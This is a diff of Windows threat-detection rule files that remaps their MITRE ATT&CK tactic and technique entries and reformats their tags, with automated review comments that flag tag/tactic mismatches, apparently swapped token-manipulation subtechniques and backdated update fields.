@@ -89,13 +89,31 @@ process where event.type == "start" and host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_named_pipe_impersonation.toml b/rules/windows/privilege_escalation_named_pipe_impersonation.toml index 72f5e35f7c6..17355c1cbf2 100644 --- a/rules/windows/privilege_escalation_named_pipe_impersonation.toml +++ b/rules/windows/privilege_escalation_named_pipe_impersonation.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -135,18 +135,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + 
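Review bot: No tags hunk for the msi-repair rule appears anywhere in this diff (its other hunk is the `updated_date` line), so the newly added `TA0005` / `Defense Evasion` entry is only consistent if the existing tags already include `"Tactic: Defense Evasion"`; that is not visible here and should be confirmed, otherwise the tag/tactic helper introduced in `tests/test_all_rules.py` by this patch will flag it. The added block also carries three blank lines before the final `[rule.threat.tactic]` and none between the first tactic table and the second `[[rule.threat]]`; one blank per table would match the file's previous layout.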
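Review bot: In the named-pipe impersonation hunk the `T1134.001` (Token Impersonation/Theft) subtechnique is removed, leaving only the parent `T1134`; named-pipe impersonation is the textbook example of that subtechnique, so this loses precision for no visible gain, and the `newcreds` rule later in this diff gains T1134.001 at the same time, which suggests the two edits may have been transposed. Keep `id = "T1134.001"` / `name = "Token Impersonation/Theft"` here unless the removal is intentional. `updated_date` also moves back to `2025/03/20` despite the mapping change.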
diff --git a/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml b/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml index c686464cf1d..ad3ad46e70b 100644 --- a/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml +++ b/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/15" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/24" [rule] author = ["Elastic"] @@ -53,7 +53,14 @@ references = ["https://www.elastic.co/pt/blog/how-attackers-abuse-access-token-m risk_score = 47 rule_id = "e468f3f6-7c4c-45bb-846a-053738b3fe5d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -67,39 +74,22 @@ event.category:"authentication" and host.os.type:"windows" and winlog.logon.type [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" - [[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/windows/privilege_escalation_persistence_phantom_dll.toml b/rules/windows/privilege_escalation_persistence_phantom_dll.toml index 71a2d7cae7a..4cc497eaafe 100644 --- a/rules/windows/privilege_escalation_persistence_phantom_dll.toml +++ b/rules/windows/privilege_escalation_persistence_phantom_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/02" [rule] author = ["Elastic"] 
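Review bot: The NewCredentials-logon rule switches from `T1134.002` (Create Process with Token) to `T1134.001` (Token Impersonation/Theft); as far as the hunk header shows, the rule keys on an authentication event with a particular `winlog.logon.type`, i.e. a logon created with new credentials (`runas /netonly`-style), which ATT&CK describes under T1134.002 / T1134.003 rather than under token theft. Together with the named-pipe rule earlier in this diff losing T1134.001, this looks like the two subtechniques were swapped between files; unless that is intended, restore `id = "T1134.002"` / `name = "Create Process with Token"` here. Collapsing the duplicate Defense Evasion entry into the single TA0004 one is fine and matches the per-framework duplicate check in the updated test.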
@@ -75,7 +75,17 @@ Hence for this rule to work effectively, users will need to add a custom ingest
 For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Privilege Escalation",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -141,36 +151,53 @@ any where host.os.type == "windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
 reference = "https://attack.mitre.org/techniques/T1574/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1574.001"
 name = "DLL"
 reference = "https://attack.mitre.org/techniques/T1574/001/"
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1036"
+name = "Masquerading"
+reference = "https://attack.mitre.org/techniques/T1036/"
+[[rule.threat.technique.subtechnique]]
+id = "T1036.001"
+name = "Invalid Code Signature"
+reference = "https://attack.mitre.org/techniques/T1036/001/"
+
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
 reference = "https://attack.mitre.org/techniques/T1574/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1574.001"
 name = "DLL"
 reference = "https://attack.mitre.org/techniques/T1574/001/"
+
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
diff --git a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml
index 0b8fc7248da..e4d788cb975 100644
--- a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml
+++ b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/21"
 integration = ["endpoint", "m365_defender"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/25"
 [rule]
 author = ["Elastic"]
@@ -20,7 +20,16 @@ references = ["https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-gro
 risk_score = 47
 rule_id = "8f3e91c7-d791-4704-80a1-42c160d7aa27"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -74,12 +83,10 @@ Port monitors and print processors are integral to Windows printing, managing da
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1547.010"
 name = "Port Monitors"
@@ -90,19 +97,18 @@ id = "T1547.012"
 name = "Print Processors"
 reference = "https://attack.mitre.org/techniques/T1547/012/"
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1547.010"
 name = "Port Monitors"
@@ -113,7 +119,9 @@ id = "T1547.012"
 name = "Print Processors"
 reference = "https://attack.mitre.org/techniques/T1547/012/"
+
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/windows/privilege_escalation_posh_token_impersonation.toml b/rules/windows/privilege_escalation_posh_token_impersonation.toml
index 1faa3f340cd..0d2a820a60c 100644
--- a/rules/windows/privilege_escalation_posh_token_impersonation.toml
+++ b/rules/windows/privilege_escalation_posh_token_impersonation.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/08/17"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/09"
 [rule]
 author = ["Elastic"]
@@ -111,7 +111,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Data Source: PowerShell Logs",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
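Review bot: The tags rewritten in the `@@ -20,7 +20,16 @@` hunk of privilege_escalation_port_monitor_print_processor_abuse.toml drop `"Tactic: Persistence"`, but this hunk still maps the file's second `[[rule.threat]]` entry to `+id = "TA0003"` / `+name = "Persistence"`, so the tags no longer list every tactic present in `rule.threat`. A tag-versus-tactic consistency check would report `Tactic: Persistence` as missing for this rule. Either re-add `"Tactic: Persistence",` next to `"Tactic: Privilege Escalation",` in the tags list, or remove the Persistence `[[rule.threat]]` entry if the rule is no longer meant to carry that tactic.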
@@ -155,49 +162,44 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1134"
 name = "Access Token Manipulation"
 reference = "https://attack.mitre.org/techniques/T1134/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1134.001"
 name = "Token Impersonation/Theft"
 reference = "https://attack.mitre.org/techniques/T1134/001/"
-[[rule.threat.technique.subtechnique]]
-id = "T1134.002"
-name = "Create Process with Token"
-reference = "https://attack.mitre.org/techniques/T1134/002/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1134"
-name = "Access Token Manipulation"
-reference = "https://attack.mitre.org/techniques/T1134/"
-
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
 [[rule.threat.technique.subtechnique]]
-id = "T1134.001"
-name = "Token Impersonation/Theft"
-reference = "https://attack.mitre.org/techniques/T1134/001/"
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
+[[rule.threat.technique]]
+id = "T1106"
+name = "Native API"
+reference = "https://attack.mitre.org/techniques/T1106/"
-[[rule.threat.technique.subtechnique]]
-id = "T1134.002"
-name = "Create Process with Token"
-reference = "https://attack.mitre.org/techniques/T1134/002/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
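Review bot: The new second `[[rule.threat]]` entry in privilege_escalation_posh_token_impersonation.toml maps to `+id = "TA0002"` / `+name = "Execution"`, but the tags rewritten in this file's `@@ -111,7 +111,14 @@` hunk list only `"Tactic: Privilege Escalation"`, so `Tactic: Execution` is present in `rule.threat` and absent from tags. Add `"Tactic: Execution",` to the tags list (or drop the Execution entry) so the two agree, as the other files in this chunk that gained an Execution tactic (reg_service_imagepath_mod, service_control_spawned_script_int, uac_bypass_com_ieinstal) already do.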
diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml
index d80c2c3760f..75067c258a1 100644
--- a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml
+++ b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/07/06"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -66,7 +66,19 @@ references = ["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34
 risk_score = 47
 rule_id = "c4818812-d44f-47be-aaef-4cfb2f9cc799"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Data Source: Elastic Endgame",
+ "Use Case: Vulnerability",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -79,18 +91,14 @@ file where host.os.type == "windows" and event.type == "deletion" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1070"
-name = "Indicator Removal"
-reference = "https://attack.mitre.org/techniques/T1070/"
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
-[[rule.threat.technique.subtechnique]]
-id = "T1070.004"
-name = "File Deletion"
-reference = "https://attack.mitre.org/techniques/T1070/004/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml
index c9ab8872997..c415ada0e36 100644
--- a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml
+++ b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/05"
 integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/10/07"
 [rule]
 author = ["Elastic"]
@@ -63,7 +63,20 @@ references = ["https://cube0x0.github.io/Pocing-Beyond-DA/"]
 risk_score = 47
 rule_id = "b66b7e2b-d50a-49b9-a6fc-3a383baedc6b"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Crowdstrike", "Resources: Investigation Guide", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Privilege Escalation",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+ "Data Source: SentinelOne",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Elastic Endgame",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -122,56 +135,46 @@ registry where host.os.type == "windows" and event.type == "change" and process.
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1543.003"
 name = "Windows Service"
 reference = "https://attack.mitre.org/techniques/T1543/003/"
+
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
 reference = "https://attack.mitre.org/techniques/T1574/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1574.011"
 name = "Services Registry Permissions Weakness"
 reference = "https://attack.mitre.org/techniques/T1574/011/"
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-
+id = "T1569"
+name = "System Services"
+reference = "https://attack.mitre.org/techniques/T1569/"
 [[rule.threat.technique.subtechnique]]
-id = "T1543.003"
-name = "Windows Service"
-reference = "https://attack.mitre.org/techniques/T1543/003/"
+id = "T1569.002"
+name = "Service Execution"
+reference = "https://attack.mitre.org/techniques/T1569/002/"
-[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
-[[rule.threat.technique.subtechnique]]
-id = "T1574.011"
-name = "Services Registry Permissions Weakness"
-reference = "https://attack.mitre.org/techniques/T1574/011/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml
index 558c245bdf1..e411a855b25 100644
--- a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml
+++ b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/26"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/11"
 [rule]
 author = ["Elastic"]
@@ -92,13 +92,19 @@ registry.path : (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
 reference = "https://attack.mitre.org/techniques/T1574/"
+[[rule.threat.technique.subtechnique]]
+id = "T1574.007"
+name = "Path Interception by PATH Environment Variable"
+reference = "https://attack.mitre.org/techniques/T1574/007/"
+
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml
index 72e4b92d865..2f73a8e24e7 100644
--- a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml
+++ b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/12/12"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/14"
 [rule]
 author = ["Elastic"]
@@ -60,7 +60,18 @@ references = [
 risk_score = 73
 rule_id = "bdcf646b-08d4-492c-870a-6c04e3700034"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Vulnerability", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Privilege Escalation",
+ "Use Case: Active Directory Monitoring",
+ "Data Source: Active Directory",
+ "Use Case: Vulnerability",
+ "Data Source: Windows Security Event Logs",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -73,13 +84,36 @@ iam where host.os.type == "windows" and event.action == "renamed-user-account" a
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.002"
+name = "Domain Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/002/"
+
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
diff --git a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml
index 71c3a72deec..c2d36fb1b78 100644
--- a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml
+++ b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "system", "windows", "m365_defender", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [transform]
 [[transform.osquery]]
@@ -88,7 +88,20 @@ references = ["https://www.elastic.co/security-labs/invisible-miners-unveiling-g
 risk_score = 21
 rule_id = "e8571d5f-bea1-46c2-9f56-998de2d3ed95"
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Tactic: Defense Evasion",
+ "Tactic: Execution",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Crowdstrike",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -107,54 +120,73 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1569"
-name = "System Services"
-reference = "https://attack.mitre.org/techniques/T1569/"
-
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
 [[rule.threat.technique.subtechnique]]
-id = "T1569.002"
-name = "Service Execution"
-reference = "https://attack.mitre.org/techniques/T1569/002/"
+id = "T1543.003"
+name = "Windows Service"
+reference = "https://attack.mitre.org/techniques/T1543/003/"
+
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1047"
+name = "Windows Management Instrumentation"
+reference = "https://attack.mitre.org/techniques/T1047/"
 [[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
 [[rule.threat.technique.subtechnique]]
-id = "T1543.003"
-name = "Windows Service"
-reference = "https://attack.mitre.org/techniques/T1543/003/"
+id = "T1059.003"
+name = "Windows Command Shell"
+reference = "https://attack.mitre.org/techniques/T1059/003/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.005"
+name = "Visual Basic"
+reference = "https://attack.mitre.org/techniques/T1059/005/"
+
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
+[[rule.threat.technique.subtechnique]]
+id = "T1218.010"
+name = "Regsvr32"
+reference = "https://attack.mitre.org/techniques/T1218/010/"
 [[rule.threat.technique.subtechnique]]
-id = "T1543.003"
-name = "Windows Service"
-reference = "https://attack.mitre.org/techniques/T1543/003/"
+id = "T1218.011"
+name = "Rundll32"
+reference = "https://attack.mitre.org/techniques/T1218/011/"
+
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml
index e3e21e88119..db144eec549 100644
--- a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml
+++ b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/05/11"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/14"
 [rule]
 author = ["Elastic"]
@@ -87,13 +87,24 @@ iam where host.os.type == "windows" and event.action == "changed-computer-accoun
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
